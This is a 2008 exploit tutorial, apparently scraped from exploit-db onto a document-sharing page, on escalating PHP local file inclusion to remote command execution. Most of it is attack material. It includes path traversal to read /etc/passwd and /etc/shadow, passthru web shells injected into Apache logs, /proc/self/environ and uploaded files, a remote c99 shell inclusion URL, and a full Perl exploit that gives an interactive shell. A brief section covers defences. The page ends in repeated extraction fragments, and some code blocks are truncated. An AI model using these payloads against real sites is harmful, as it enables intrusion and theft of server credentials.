Lfi To Rce

Vulnerability analysis, Security Papers, Exploit Tutorials - Part 12992
1 de 21
https://www.exploit-db.com/papers/12992/
|=--------------------------------------------------------------------=|
|=-------------=[ LFI to RCE Exploit with Perl Script ]=--------------=|
|=------------------------=[ 7 December 2008 ]=-----------------------=|
|=----------------------=[
By CWH Underground
]=--------------------=|
|=--------------------------------------------------------------------=|
######
Info
######
Title
Author
Team
: LFI to RCE Exploit with Perl Script
: ZeQ3uL && JabAv0C
: CWH Underground [www.milw0rm.com/author/1456]
Website : cwh.citec.us / www.citec.us

Date
: 2008-12-07
##########
Contents
##########
[0x00] - Introduction
[0x01] - File Inclusion (RFI/LFI)
[0x01a] - How the attack works for Remote File Inclusion [RFI]
[0x01b] - How the attack works for Local File Inclusion [LFI]
[0x01c] - Vulnerable PHP Function for File Inclusion
[0x02] - Local File Inclusion To Remote Command Execution [LFI <> RCE]
[0x02a] - LFI <> RCE via Apache Log Injection
[0x02b] - LFI <> RCE via Process Environ Injection

[0x02c] - LFI <> RCE via Other Files
14/05/2016 11:28 a. m.
2 de 21
[0x03] - Fundamental of Perl Library for Exploit Website

[0x03a] - Introduction to Socket
[0x03b] - Introduction to Library for WWW in Perl (LWP)

[0x03c] - Condition to use Socket or LWP
[0x04] - Writing LFI <> RCE Exploit with Perl Script

[0x04a] - Perl Exploit to Injecting code into Target
[0x04b] - Perl Exploit to Executing injected code on Target
[0x04c] - LFI <> RCE Complete Exploit [Use Logfile Injection]

[0x05] - How to protect File Inclusion
[0x06] - References
[0x07] - Greetz To
#######################
[0x00] - Introduction
#######################
Welcome reader, this paper is a short attempt at documenting a practical technique
we have been working on. This papers will guide about technique that allows the attackers
(us) gaining access into the process of exploiting a website via File Inclusion (RFI/LFI)
and enlight the way to create own exploit script with perl
This paper is divided into 7 sections but only from section 0x01 to 0x05
are about technical information.
Section 0x01, we talk about general concept of attacking via File Inclusion.
Section 0x02, we give a detail of how to execute arbitrary command via Local File Inclusion
in each approach. Section 0x03, we offer rudimentary commands to create HTTP transaction
with perl and some examples of how to use them. Section 0x04, we assemble knowleadge from
Section 0x01 to 0x03 in order to create own exploit to execute command on target system
via Local File Inclusion. The last, section 0x05, we suggest some methods to protect
your system from File Inclusion Attacking.
###################################
[0x01] - File Inclusion (RFI/LFI)
###################################
In a File Inclusion, Attackers run their own code on a vulnerable website.
The attack involves importing code into a program by taking advantage of the unenforced
14/05/2016 11:28 a. m.
3 de 21
and unchecked assumptions the program makes about its inputs. If the attacker can include
their own malicious code on a web page, it is possible to "convince" a PHP script to include
a remote file instead of a presumably trusted file from the local file system.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[0x01a] - How the attack works for Remote File Inclusion [RFI]
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Remote File Inclusion, known as RFI, is the technique to attack website by
injecting php script into target website. It's including "External" files (PHP Shell)
in a victim website.If attacker exploits successfully, he can execute arbitary command

on victim web server.
For instance, a piece of vulnerable PHP code would look like this:
[code]---------------------------------------------------------------------------------<?php
$file =$_GET['page'];
include($file .".php");
?>
//The page we wish to display

<-- Vulnerable !!
[End code]--------------------------------------------------------------------------------From Code, It does not perform any checks on the content of the $page variable so it is easy
to putting our file (PHP Shell) into webpage like this
[URL] http://www.hackme.com/index.php?page=http://www.cwh.org/c99.php? and then

[code]--------------------------------------------------------------------------------<?php
$file ="http://www.cwh.org/c99.php?";
include($file .".php");
?>
//$_GET['page'];
//include http://www.cwh.org/C99.php?.php
[End code]--------------------------------------------------------------------------------** We put "?" at the end of the URL, This makes the script fetch the intended file,
with the appended string as a parameter (which is ignored by the attackers script) **
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[0x01b] - How the attack works for Local File Inclusion [LFI]
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
LFI is a Local File Inclusion. It originates from including "internal" files
in a victim website. In many situations, It is necessary to include content from
local file. But if you use it carelessly, it may lead to LFI vulnerabilty. This method
is often used in Linux to get "/etc/passwd" and sometimes "/etc/shadow".
14/05/2016 11:28 a. m.
4 de 21
For instance, a piece of vulnerable PHP code would look like this:
[URL] http://www.hackme.com/index.php?template=cwh
[code #1]------------------------------------------------------------------------------<?php
$template =$_GET['template'];
include("/".$template .".php");
?>
<-- Vulnerable !!
[End code]-----------------------------------------------------------------------------From Code, Attacker can assign template to be "../../../../etc/passwd%00".

It causes the attacker to read a content from /etc/passwd.
[URL] http://www.hackme.com/index.php?template=../../../../etc/passwd%00
[code #1]------------------------------------------------------------------------------<?php
$template =$_GET['template'];
include("/../../../../etc/passwd%00.php");
?>
<-- Directory Traversal to LFI
[End code]-----------------------------------------------------------------------------** Notice %00 (Null CHAR) will ignore everything that comes after %00 (.php suffix) **
** Notice ../../../ will traversal path to root and goto /etc/passwd **
[code #2]------------------------------------------------------------------------------if(grado($HTTP_COOKIE_VARS['cwh_user'],$HTTP_COOKIE_VARS['cwh_pass']) == "admin")

{
topmenu();
include("manage/admin/main.php");
foot();
} else
topmenu();
include("manage/".$HTTP_COOKIE_VARS['cwh_user']."/main.php");
}
foot();
[End code]-----------------------------------------------------------------------------From Code, Attacker can exploit via JaSiLDBG
(Javascript Inline Debugger - www.milw0rm.com/papers/147)

PoC Exploit: javascript:document.cookie = "cwh_user=../../../../etc/passwd%00; path=/";
14/05/2016 11:28 a. m.
5 de 21
++++++++++++++++++++++++++++++++++++++++++++++++++++++
[0x01c] - Vulnerable PHP Function for File Inclusion
++++++++++++++++++++++++++++++++++++++++++++++++++++++
File Inclusion (RFI/LFI) mostly occurs from some functions that developers
do not properly check user supplied data.

Example PHP function:
include()
include_once()
require()
require_once()
fopen()
#######################################################################
[0x02] - Local File Inclusion To Remote Command Execution [LFI<>RCE]
#######################################################################
files.
In this section, we mention about the concept of using LFI in another way besides reading
Normally, We use LFI to read following files:

/etc/passwd
/etc/shadow
/etc/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
or
Dababase Configuration (config.inc.php)

But we can apply LFI Vulnerabilities to execute command by injecting malicious code
into Apache log, Process Environment and Other files. This method is called "Remote Code Execution
(RCE)"
+++++++++++++++++++++++++++++++++++++
[0x02a] - LFI <> RCE via Apache Log
+++++++++++++++++++++++++++++++++++++
contain
The Malicious HTTP Request must existed to Apache logs, By their intrinsic nature logfiles
data that is driven by users look like this:
14/05/2016 11:28 a. m.
6 de 21
[HTTP Request via
Telnet]-------------------------------------------------------------->telnet www.hackme.com 80
GET /index.php?p=new.php HTTP/1.1
<-- Normally GET Request when
user visit websites
HTTP/1.1 200 OK Content-Length: 82015 Content-Type: text/html Content-Location:
[End Telnet]---------------------------------------------------------------------------[Logfiles - access.log]----------------------------------------------------------------......
58.18.29.152 - - [05/Dec/2008:12:13:22 +0700]

"GET /index.php?p=new.php HTTP/1.1" 200 1958
......
[End log]------------------------------------------------------------------------------If we want to run arbitrary command on target system, we must inject PHP code via
HTTP request like <?passthru($_GET[cmd])?> After that logfiles will contain Malicious Code
[Malicious HTTP Request via Telnet]---------------------------------------------------->telnet www.hackme.com 80
Telnet
GET /cwh/<? passthru($_GET[cmd]) ?> HTTP/1.1
<-- Malicious HTTP Request via
[End telnet]---------------------------------------------------------------------------[Logfiles - access.log]----------------------------------------------------------------......
58.18.29.152 - - [05/Dec/2008:12:14:22 +0700]
"GET /cwh/<? passthru($_GET[cmd]) ?> HTTP/1.1" 200 1958

......
<-- Inject Code into Logfiles
[End log]-------------------------------------------------------------------------------
stored
Now We can use LFI Vuln to run arbitrary command by finding out where the logs are
Go to LFI Vuln path:
[URL] www.hackme.com/index.php?p=../../apache/logs/access.log
(You can see ../../ that traversal to apache access log)
<-- You must find Log location
In webpage, you will see detailed like this:

Warning: passthru() [function.passthru]: Cannot execute a blank command in
/opt/lampp/apache/logs/access.log
on line 457
14/05/2016 11:28 a. m.
7 de 21
That's Great !! We have alredy injected code to logfiles, Now run arbitrary command
with "cmd" variable like this:
[LFI <> RCE URL] www.hackme.com/index.php?p=../../apache/logs/access.log%00&cmd=ls -la

** Notice **
If you send Malicious HTTP Request from browser
"www.hackme.com/cwh/<? passthru($_GET[cmd]) ?>", the logfile will show in URL encode format
[Logfiles - access.log]----------------------------------------------------------------......
58.18.29.152 - - [05/Dec/2008:12:15:14 +0700]
"GET /cwh/%3C?%20passthru($_GET[cmd])%20?%3E HTTP/1.1" 200 1958 <-- Not work for Inject
......
[End log]------------------------------------------------------------------------------It won't work for RCE because browser will automatically encode special characters
(URL encode) after that it writes encoded request into logfiles (access.log).
So we must Inject malicious code via Telnet, Netcat or Perl script with
socket/useragent/referer that we will guide in next chapter.

== How about error.log ==
Error log is written when the requested file does not exist. Thus we can inject
malicious code by requesting to non-existed file or inject via "Referer".
[Malicious HTTP Request via Telnet]---------------------------------------------------->telnet www.hackme.com 80
GET /<? passthru($_GET[cmd]) ?>
<-- Get non-existed file with PHP Code
[End telnet]---------------------------------------------------------------------------[Logfiles - error.log]-----------------------------------------------------------------......
[Sat Dec 06 15:12:56 2008] [error] [client 127.0.0.1] (20024)The given path
misformatted or contained invalid characters: Cannot map GET /<?passthru($_GET[cmd])?> to file

......
[End log]------------------------------------------------------------------------------Bingo !! We can injected code thru error.log, Next example show you about inject code
into "referer".
[Logfiles -
14/05/2016 11:28 a. m.
8 de 21
error.log]-----------------------------------------------------------------......
[Sat Dec 06 13:57:57 2008] [error] [client 58.14.21.120]
File does not exist: /opt/lampp/htdocs/test/images/boxmenu.gif,

referer: http://www.hackme.com/index.php?p=main.php
......
<-- Normally HTTP Request
[End log]-------------------------------------------------------------------------------
written
From log, Attacker can inject malicious code into "referer" then error.log will be
evil code. However injecting to access.log is easier than error.log
[Logfiles -
error.log]-----------------------------------------------------------------......
[Sat Dec 06 13:57:57 2008] [error] [client 58.14.21.120]
File does not exist: /opt/lampp/htdocs/test/images/boxmenu.gif,

referer: <? passthru($_GET[cmd]) ?>
......
<-- Inject Malicious Code in Referer
[End log]------------------------------------------------------------------------------Default Log locations list that used with LFI:

../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/acces.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../../../usr/local/apache/logs/access_ log
../../../../../../../usr/local/apache/logs/access. log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
../../../../../../../usr/local/apache/logs/error_l og
../../../../../../../usr/local/apache/logs/error.l og
14/05/2016 11:28 a. m.
9 de 21
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache2/error_log
../../../../../../../var/log/apache/error.log
../../../../../../../var/log/apache2/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log
++++++++++++++++++++++++++++++++++++++++++
[0x02b] - LFI <> RCE via Process Environ
++++++++++++++++++++++++++++++++++++++++++
When we request to PHP page, new process will be created. In *nix system, Each process
has its own /proc entry. /proc/self/ is a static path and symbolic link from lastest process
used that contain useful information. If we inject malicious code into /proc/self/environ, we
can run arbitrary command from target via LFI
[The Question] How to inject code into /proc/self/environ ?

[The Answer]
agent
We can inject thru User-Agent.
In Firefox Browser, we use "User Agent Switcher Add-ons" that can specify your user
manually Or use perl script to specify user agent with malicious code (See Next chapter).
For instance, a piece of /proc/self/environ would look like this:
[code]---------------------------------------------------------------------------------PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin:/usr/bin:/bin
SERVER_ADMIN=root@hackme.com
...
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4)

Gecko/2008102920 Firefox/3.0.4 HTTP_KEEP_ALIVE=300
...
<-- It contains User-agent
[End code]-----------------------------------------------------------------------------When we injected <?passthru($_GET[cmd])?> into our User Agent,
/proc/self/environ will contain Malicious code like this:
[code]---------------------------------------------------------------------------------PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin:/usr/bin:/bin
SERVER_ADMIN=root@hackme.com
...
<?passthru($_GET[cmd])?> HTTP_KEEP_ALIVE=300
...
<-- Injected Malicious code
[End code]-----------------------------------------------------------------------------Then Go to www.hackme.com/index.php?p=../../../../../proc/self/environ%00&cmd=ls -la
14/05/2016 11:28 a. m.
10 de 21
** Notice **
We don't recommend to use this method because It's immediately to inject code and run
command before self link change to other process.
++++++++++++++++++++++++++++++++++++++
[0x02c] - LFI <> RCE via Other Files
++++++++++++++++++++++++++++++++++++++
We saw Vulnerabilities in old version of FCKEditor (www.milw0rm.com/exploits/1484)
that allow many file extension to be uploaded, Some versions we can upload an extension not
specified in FCKEditor
Config[DeniedExtensions][File] array such as .php3,.aa,.bb,.cwh,.blahblahblah. If the website
have vulnerability
in Local File Inclusion, we can inject malicious code (<?passthru($_GET[cmd])?>) into uploaded
file and use LFI
traversal with uploaded file links (/userfiles/upload/shell.cwh) to run arbitrary command.

For example:
[LFI Vulnerable] www.hackme.com/index.php?p=
[Uploaded File]
[LFI <> RCE]
www.hackme.com/userfiles/upload/shell.cwh
www.hackme.com/index.php?p=./userfiles/upload/shell.cwh%00&cmd=ls -la
Many website in the world allow to upload image file (jpg/gif/bmp/...) almost websites
only check file extension
(.jpg/.gif/...) so it's vuln !!. If Attacker inject malicious code into image file (Maybe use
edjpgcom to insert PHP code
to jpeg file or change extension to image file manually) and upload to target server, Use LFI
technique traversal to
uploaded file and execution arbitrary command.

** We will guide you about specify file extension with Perl in Next chapter **
##########################################################
[0x03] - Fundamental of Perl Library for Exploit Website
##########################################################
In this section, we will talk about fundamental of neccessary perl commands used to send HTTP
packet to server.
They play a significant role in writing exploit. We recommend you to read this section before step to
next section.
But if you are familiar with Socket and LWP, you can skip this section. All commands mentioned in this
section will be
14/05/2016 11:28 a. m.
11 de 21
used in next section.

++++++++++++++++++++++++++++++++++
[0x03a] - Introduction to Socket
++++++++++++++++++++++++++++++++++
between our pc
Socket is method to create a connection between hosts. we use it to create a connection
and a remote server in order to send manipulated request to a server. The informations that we
have to provide for
a socket are protocol, server address, server port and data. In perl, we use IO::Socket library
to create a socket.
Syntax for create a socket is following.

[code]---------------------------------------------------------------------------------$socket = IO::Socket::INET->new (PROTOCAL, PEERADDR, PEERPORT);
[End code]-----------------------------------------------------------------------------For Example: If we want to create socket to port 80 on server ip 192.168.0.111 with tcp
protocol,
we can use following command:

[code]---------------------------------------------------------------------------------$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80");
[End code]-----------------------------------------------------------------------------when we want to send http request through this socket, we can use this syntax.
[code]---------------------------------------------------------------------------------print $socket $data;
[End code]-----------------------------------------------------------------------------For Example:

print $socket "GET /index.php HTTP/1.1\r\n";
print $socket "Host: 192.168.0.111\r\n";
print $socket "Connection: close\r\n\r\n";
[End code]-----------------------------------------------------------------------------After finish using socket, we have to close the socket by this syntax.
[code]---------------------------------------------------------------------------------close ($socket);
[End code]------------------------------------------------------------------------------
14/05/2016 11:28 a. m.
12 de 21
Finally, we can group the entire code together.

[code]---------------------------------------------------------------------------------use IO::Socket;
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80");

print $socket "Host: 192.168.0.111\r\n";

close ($socket);
[End code]------------------------------------------------------------------------------
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[0x03b] - Introduction to Library for WWW in Perl (LWP)
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
this library
LWP is a set of perl module designed to handle sending of http request. Usually we use
simultaneously with HTTP::Request and HTTP::Response.

If we speak clearly, we can classify a role of these library as following:
- HTTP::Request
=> used to manipulate http request.
- LWP::UserAgent => used to sent http request.
- HTTP::Response => used to handle http response.

If we want to use these libraries to obtain content from index.php file on 192.168.0.111,
we can following these steps.
1: Create http request header using HTTP::Request

[code]---------------------------------------------------------------------------------$request = HTTP::Request->new (GET => "http://192.168.0.111/index.php");
$request->header (User_Agent => "Mozilla 2.0");
[End code]-----------------------------------------------------------------------------2: Send the http request to server by LWP::UserAgent and obtain http response by HTTP::Response
[code]---------------------------------------------------------------------------------$ua = LWP::UserAgent->new();
object.
object
$response = $ua->request ($request);
## Return value of request function is HTTP::Response

## So now we have $response holding HTTP::Response
[End code]------------------------------------------------------------------------------
14/05/2016 11:28 a. m.
13 de 21
3: Get http response content from HTTP::Response object, Ex:

[code]---------------------------------------------------------------------------------print $response->code;
## response code ex. 200, 404, 503
print $response->content;
## html code of http response
print $response->header->as_string;
## response header
[End code]-----------------------------------------------------------------------------If we group all code together to show header and content of http transaction, we can do
following:
[code]---------------------------------------------------------------------------------use LWP;
use HTTP::Request;
$request = HTTP::Request->new (GET => "http://192.168.0.111/index.php");
$request->header (User_Agent => "Mozilla 2.0");
$ua = LWP::UserAgent->new();

print $response->header->as_string;
cannot to print as string,

print "\n";
## $response->header is an object of HTTP::Header. It

## so we use as_string method to solve this problem
print $response->content;
[End code]------------------------------------------------------------------------------
++++++++++++++++++++++++++++++++++++++++++
[0x03c] - Condition to use Socket or LWP
++++++++++++++++++++++++++++++++++++++++++
As you can see above, Socket and LWP can send http request to server.
But we have only a few conditions to dicide to use Socket or LWP.

1: We will use Socket when,
- We do not want http response. (Only inject http request packet to server)
- We do not want http request to be encoded. (If we send get method with LWP, the HTTP request
will be URL Encoded)
2: We will use LWP when,

- We want http response. (It will be stored in HTTP::Response object)
- Other condition ;D (We think it is more convenient to us than Socket)
14/05/2016 11:28 a. m.
14 de 21
######################################################
[0x04] - Writing LFI <> RCE Exploit with Perl Script
######################################################
++++++++++++++++++++++++++++++++++++++++++++++++++++++
[0x04a] - Perl Exploit to Injecting code into Target
++++++++++++++++++++++++++++++++++++++++++++++++++++++
have to work
We can inject our php code to server in many ways as I mention above. The rest that we
with is creating perl script to do our task.
To create perl script to send malicious request, we will use socket to help this part.
that.
Before writing perl script, we have to know which file we will inject code into and how to do
[+] Inject via logfile
manipulate
Logfiles are written when there is a request to a file on server. Thus we can
http request in order to inject malicious code.

Example:
print $socket "GET /cwhunderground <? passthru(\$_GET[cmd]); ?> HTTP/1.1\r\n";
print $socket "host: 192.168.0.111\r\n";

close ($socket);
[End code]------------------------------------------------------------------------------
[+] Inject via Other files

In some websites, they allow us to upload files. If we know the path to uploaded file,
we can use LFI vulnerability to execute command in our uploaded file.

Example:

print $socket "POST /uploadsave.php HTTP/1.1\r\n";
print $socket "Content-Type: multipart/form-data; boundary=CwHCwH\r\n";

print $socket "--CwHCwH\r\n";
print $socket "Content-Disposition: form-data; name=\"shell.cwh\"; filename=\"shell.cwh\"\r\n";
14/05/2016 11:28 a. m.
15 de 21
print $socket "Content-Type: application/zip\r\n\r\n";

print $socket "<? passthru(\$_GET[cmd]); ?>\n";
print $socket "--CwHCwH\r\n";
close ($socket);
[End code]------------------------------------------------------------------------------
[+] Inject via process environment

In process environment file, there is user agent of using browser as a part of content.
Therefore we can inject malicious code by spoofing user agent.

Example:

print $socket "User-Agent: <? passthru(\$_GET[cmd]); ?>\r\n";

close ($socket);
[End code]------------------------------------------------------------------------------
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[0x04b] - Perl Exploit to Executing injected code on Target
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
code.
to bring
As previous section, we can inject malicious code into some files on server by example
In this section, we will show how to create script to execute our code on server. So, we have
the concept from section 0x03b about LWP library.
(We choose to use LWP because we need http response to show result from execution of our code)
[+] Execute code from logfile
[code]---------------------------------------------------------------------------------use LWP;
use HTTP::Request;
$logfile = "../../../../var/log/httpd/access.log";
locations
<-- We must specify Logfile
## looping for execute command and exit program when command = exit ##
print "cwh-shell# ";
chomp( $cmd = <STDIN> );
14/05/2016 11:28 a. m.
16 de 21
while($cmd !~ "exit")
{
$content = "";
$request = HTTP::Request->new (GET => "http://192.168.0.111/path/to
/lfi.php?file=".$logfile."%00&cmd=".$cmd);

$content = $response->content;
print $content."\n";
}
[End code]------------------------------------------------------------------------------
[+] Execute code from Other files

I assume that the uploaded file is ../../../path/to/uploaded/file/shell.cwh .
We will get RCE script like this.
[code]---------------------------------------------------------------------------------use LWP;
use HTTP::Request;
$uploadedfile = "../../../path/to/uploaded/file/shell.cwh";
## looping for execute command and exit program when command = exit ###

{
$content = "";
/lfi.php?file=".$uploadedfile."%00&cmd=".$cmd);

}
[End code]-----------------------------------------------------------------------------[+] Execute code from process environment

The injected process environment file is /proc/self/environ.
So, we have to traversal back to root path by using ../../
14/05/2016 11:28 a. m.
17 de 21
[code]---------------------------------------------------------------------------------use LWP;
use HTTP::Request;
$procenviron = "../../../../../../proc/self/environ";
## looping for execute command and exit program when command = exit ##

{
$content = "";
/lfi.php?file=".$procenviron."%00&cmd=".$cmd);

}
[End code]------------------------------------------------------------------------------
Finally, as you can see from three codes above, the code to loop for execute command is
the same.
The difference is how to find a path of injected file.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[0x04c] - LFI <> RCE Complete Exploit [Use Logfile Injection]
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
path of logfile.
contain
In order to execute code from logfile, we have a problem that we do not know the exact
So we have to find path by looping through the fesible paths that we have and see which file
the word "cwhunderground" as we inject in previous example code.
Simple Code for LFI <> RCE Exploit:
[code]---------------------------------------------------------------------------------use LWP::UserAgent;
use IO::Socket;
use LWP::Simple;
$log="../";
14/05/2016 11:28 a. m.
18 de 21
@apache=(
"../../../../../var/log/httpd/access_log",
"../apache/logs/access.log",
"../../apache/logs/access.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/access.log",
"../logs/access.log",
"../../logs/access.log",
"../../../logs/access.log",
"../../../../logs/access.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../.. /../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/log/access_log"
);
my $sis="$^O";if ($sis eq 'MSWin32') { system("cls"); } else { system("clear"); }

print "\n==========================================\n";
print "
LFI to RCE Exploit \n";
print "
By CWH Underground \n";
print "==========================================\n";
if (@ARGV < 2)
{
print "Usage: ./xpl.pl <Host> <Path>\n";
print "Ex. ./xpl.pl www.hackme.com /ktp/index.php?page=\n";
$host=$ARGV[0];
$path=$ARGV[1];
if ( $host
=~
/^http:/ ) {$host =~ s/http:\/\///g;}
print "\nTrying to Inject the Code...\n";
$CODE="<?php if(get_magic_quotes_gpc()){ \$_GET[cmd]=stripslashes(\$_GET[cmd]);}
passthru(\$_GET[cmd]);?>";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Could
not connect to host.\n\n";
14/05/2016 11:28 a. m.
19 de 21
print $socket "GET /cwhunderground "."\#\#%\$\$%\#\#".$CODE."\#\#%\$\$%\#\#"." HTTP/1.1\r\n";

print $socket "Host: ".$host."\r\n";

close($socket);
if ( $host
!~
/^http:/ ) {$host = "http://" . $host;}
foreach $getlog(@apache)
{
chomp($getlog);
$find= $host.$path.$getlog."%00";
$xpl = LWP::UserAgent->new() or die "Could not initialize browser\n";
$req = HTTP::Request->new(GET => $find);

$res = $xpl->request($req);
$info = $res->content;
if($info =~ /cwhunderground/)
{print "\nSuccessfully injected in $getlog \n";$log=$getlog;}

while($cmd !~ "exit") {
$shell= $host.$path.$log."%00&cmd=$cmd";
$xpl = LWP::UserAgent->new() or die "Could not initialize browser\n";

$req = HTTP::Request->new(GET => $shell);
$res = $xpl->request($req);
$info = $res->content;
if ($info =~ /\#\#%\$\$%\#\#(.*?)\#\#%\$\$%\#\#/sg)
{print $1;}

}
[End code]------------------------------------------------------------------------------
########################################
[0x05] - How to protect File Inclusion
########################################
- Consider implementing a chroot jail
- Check user supplied files or filenames
- Strongly validate user input, Ensure that all variables

are properly initialized prior to the first use
- Disable allow_url_fopen and allow_url_include
- Disable register_globals and use E_STRICT to find uninitialized variables

- Ensure that all file and stream functions (stream_*) are carefully vetted
14/05/2016 11:28 a. m.
20 de 21
- To avoid being injected with remote files, it is essential to specify exactly

where the file should be located, e.g. its full path
- Secure Code, If you want to use include() function, For example:

// Vulnerable Code !!
[code]---------------------------------------------------------------------------------<?php
include($file);
?>
[End code]------------------------------------------------------------------------------
// #1 Patching Code !!
[code]---------------------------------------------------------------------------------<?php
include "./new.php";
?>
<-- Should not use file name from $_GET content,

Always specify your files to include
[End code]------------------------------------------------------------------------------
// #2 Patching Code !!
[code]---------------------------------------------------------------------------------<?php
$check = array('index.php', 'new.php', 'guestbook.php');

if(in_array($file, $check))
{include($file);}
?>
<-- Check $_GET['page'] from array[]
else{die("Don't Hack Me Plz!");}
[End code]------------------------------------------------------------------------------
#####################
[0x06] - References
#####################
[1] http://en.wikipedia.org/wiki/Remote_File_Inclusion
[2] http://cwe.mitre.org/data/definitions/98.html
[3] hakin9: Remote and File Inclusion Explained (Gordon Johnson)

[4] http://www.perl.com/pub/a/2002/08/20/perlandlwp.html
14/05/2016 11:28 a. m.
21 de 21
[5] www.owasp.org/index.php/PHP_Top_5
[6] www.milw0rm.com
####################
[0x07] - Greetz To
####################
Greetz
: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
Special Thx : asylu3, str0ke, citec.us, milw0rm.com
----------------------------------------------------
damage
This paper is written for Educational purpose only. The authors are not responsible for any
originating from using this paper in wrong objective. If you want to use this knowleadge with other
person systems,
you must request for consent from system owner before

----------------------------------------------------
# milw0rm.com [2008-12-08]
14/05/2016 11:28 a. m.

Lfi To Rce

Uploaded by

Document Information

Original Description:

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Lfi To Rce

Uploaded by

Copyright:

Available Formats

Vulnerability analysis, Security Papers, Exploit Tutorials - Part 12992

: LFI to RCE Exploit with Perl Script

: ZeQ3uL && JabAv0C

: CWH Underground [www.milw0rm.com/author/1456]

Website : cwh.citec.us / www.citec.us

[0x02b] - LFI <> RCE via Process Environ Injection

Vulnerability analysis, Security Papers, Exploit Tutorials - Part 12992

[0x03] - Fundamental of Perl Library for Exploit Website

[0x03b] - Introduction to Library for WWW in Perl (LWP)

[0x04] - Writing LFI <> RCE Exploit with Perl Script

[0x04b] - Perl Exploit to Executing injected code on Target

[0x04c] - LFI <> RCE Complete Exploit [Use Logfile Injection]

are about technical information.

Vulnerability analysis, Security Papers, Exploit Tutorials - Part 12992

in a victim website.If attacker exploits successfully, he can execute arbitary command

//The page we wish to display

[URL] http://www.hackme.com/index.php?page=http://www.cwh.org/c99.php? and then

in a victim website. In many situations, It is necessary to include content from

Vulnerability analysis, Security Papers, Exploit Tutorials - Part 12992

[End code]-----------------------------------------------------------------------------From Code, Attacker can assign template to be "../../../../etc/passwd%00".

<-- Directory Traversal to LFI

[code #2]------------------------------------------------------------------------------if(grado($HTTP_COOKIE_VARS['cwh_user'],$HTTP_COOKIE_VARS['cwh_pass']) == "admin")

[End code]-----------------------------------------------------------------------------From Code, Attacker can exploit via JaSiLDBG

(Javascript Inline Debugger - www.milw0rm.com/papers/147)

Vulnerability analysis, Security Papers, Exploit Tutorials - Part 12992

do not properly check user supplied data.

Normally, We use LFI to read following files:

Dababase Configuration (config.inc.php)

Vulnerability analysis, Security Papers, Exploit Tutorials - Part 12992

[HTTP Request via

GET /index.php?p=new.php HTTP/1.1

<-- Normally GET Request when

user visit websites

HTTP/1.1 200 OK Content-Length: 82015 Content-Type: text/html Content-Location:

[End Telnet]---------------------------------------------------------------------------[Logfiles - access.log]----------------------------------------------------------------......

58.18.29.152 - - [05/Dec/2008:12:13:22 +0700]

GET /cwh/<? passthru($_GET[cmd]) ?> HTTP/1.1

<-- Malicious HTTP Request via

[End telnet]---------------------------------------------------------------------------[Logfiles - access.log]----------------------------------------------------------------......

58.18.29.152 - - [05/Dec/2008:12:14:22 +0700]

"GET /cwh/<? passthru($_GET[cmd]) ?> HTTP/1.1" 200 1958

<-- Inject Code into Logfiles

<-- You must find Log location

In webpage, you will see detailed like this:

Vulnerability analysis, Security Papers, Exploit Tutorials - Part 12992

with "cmd" variable like this:

[LFI <> RCE URL] www.hackme.com/index.php?p=../../apache/logs/access.log%00&cmd=ls -la

58.18.29.152 - - [05/Dec/2008:12:15:14 +0700]

socket/useragent/referer that we will guide in next chapter.

malicious code by requesting to non-existed file or inject via "Referer".

[Malicious HTTP Request via Telnet]---------------------------------------------------->telnet www.hackme.com 80

GET /<? passthru($_GET[cmd]) ?>

<-- Get non-existed file with PHP Code

[End telnet]---------------------------------------------------------------------------[Logfiles - error.log]-----------------------------------------------------------------......

misformatted or contained invalid characters: Cannot map GET /<?passthru($_GET[cmd])?> to file

Vulnerability analysis, Security Papers, Exploit Tutorials - Part 12992

[Sat Dec 06 13:57:57 2008] [error] [client 58.14.21.120]

File does not exist: /opt/lampp/htdocs/test/images/boxmenu.gif,

<-- Normally HTTP Request

[Sat Dec 06 13:57:57 2008] [error] [client 58.14.21.120]

File does not exist: /opt/lampp/htdocs/test/images/boxmenu.gif,

<-- Inject Malicious Code in Referer